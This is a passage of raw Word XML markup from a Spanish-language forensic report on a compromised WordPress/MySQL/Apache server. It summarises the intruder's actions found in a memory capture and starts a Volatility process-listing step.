      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Borrar el </w:t>
      </w:r>
      <w:r w:rsidR="0098259F" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WordPress</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4.9.8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16230B2A" w14:textId="7C34E5A8" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Los siguientes procesos son claramente para realizar la captura de la memoria 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307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, empezando a buscar evidencias.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAD6CB7" w14:textId="44FB6D40" w:rsidR="00AA7FAD" w:rsidRPr="00763EFB" w:rsidRDefault="003854D0" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00763EFB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Conclusiones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230FA970" w14:textId="3CF0380F" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ha realizado acciones que vulneran el servicio </w:t>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0099494B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>y Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado.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307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE3E117" w14:textId="69FE8B6D" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Abre la puerta a poder acceder a las tablas sin necesidad de autenticación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033EFA10" w14:textId="63C6B472" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Concede todos los permisos a todos los usuarios a </w:t>
      </w:r>
      <w:r w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/run/nysqld</w:t>
      </w:r>
      <w:r w:rsidR="0098259F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220BEEF6" w14:textId="5BDE5446" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Elimina archivos de configuración de </w:t>
      </w:r>
      <w:r w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDB2138" w14:textId="42E19966" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="0098259F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Numerosos reinicios</w:t>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de servicios web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7796479E" w14:textId="2A856298" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Modificación de </w:t>
      </w:r>
      <w:r w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Access.log</w:t>
      </w:r>
      <w:r w:rsidR="0098259F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B467647" w14:textId="7BF79901" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Modifica el fichero de configuración de </w:t>
      </w:r>
      <w:r w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>WordPress</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29921D2E" w14:textId="03696589" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Realiza búsquedas de archivos multimedia, como</w:t>
      </w:r>
      <w:r w:rsidR="0098259F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> si estuviese</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> buscando información.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0228A5FD" w14:textId="71CE2623" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Añade un correo electrónico, test12312321@mailinator.com. un correo de un portal de Pruebas de flujo de trabajo de correo electrónico y SMS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5030AA80" w14:textId="3EFED28B" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Acciones relativas a configuraciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7609BE7F" w14:textId="7AFEE29C" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Modificaciones de ficheros de configuración de php </w:t>
      </w:r>
      <w:r w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">y </w:t>
      </w:r>
      <w:r w:rsidRPr="001A130A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDE11B5" w14:textId="3C532909" w:rsidR="00AA7FAD" w:rsidRPr="00307836" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Buscar palabra POST en ficheros .php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585A4B75" w14:textId="5C2A8ECB" w:rsidR="00AA7FAD" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Utiliza una </w:t>
      </w:r>
      <w:r w:rsidR="0098259F" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>versión</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de WordPress que se descubrió </w:t>
      </w:r>
      <w:r w:rsidR="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>una serie de vulnerabilidades el</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F13A7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">14 de diciembre </w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de 2018.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48713ADF" w14:textId="30D05542" w:rsidR="00307836" w:rsidRPr="00307836" w:rsidRDefault="00307836" w:rsidP="00307836">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Considero que, por el momento, es casualidad de que una semana después de la instalación del servidor, sin realizarse una actualización posterior. Quizás debe de estar atento a este tipo de posibles vulnerabilidades. Hoy </w:t>
      </w:r>
      <w:r w:rsidR="0098259F" w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>día</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> para el desarrollo web, Snyk revisa si las librerías que utilizas tienen vulnerabilidades. Tener alertas de este tipo siempre vienen bien para andar protegidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB0E0FD" w14:textId="7AEE68B8" w:rsidR="00307836" w:rsidRPr="00307836" w:rsidRDefault="00307836">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. La hora que marca </w:t>
      </w:r>
      <w:r w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00307836">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> no parece en cierta manera ser falsa, ya que marca la misma hora.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA59CEE" w14:textId="77777777" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D7681E3" w14:textId="77777777" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc155782512"/>
      <w:r w:rsidRPr="000C4414">
        <w:t>3.5. Búsqueda de procesos en funcionamiento de interés para el análisis.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="23A4D973" w14:textId="77777777" w:rsidR="003B16AF" w:rsidRDefault="003B16AF" w:rsidP="000C4414">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B5ED368" w14:textId="5C28C89B" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:t>Linux_pslist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C697E30" w14:textId="0119EF01" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A continuación, vamos a </w:t>
      </w:r>
      <w:r w:rsidR="009E264A" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>enumerar</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> los procesos en ejecución de la memoria capturada. para ello ejecutaremos el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>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ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.mem' linux_pslist</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Al ejecutar </w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_pslist</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
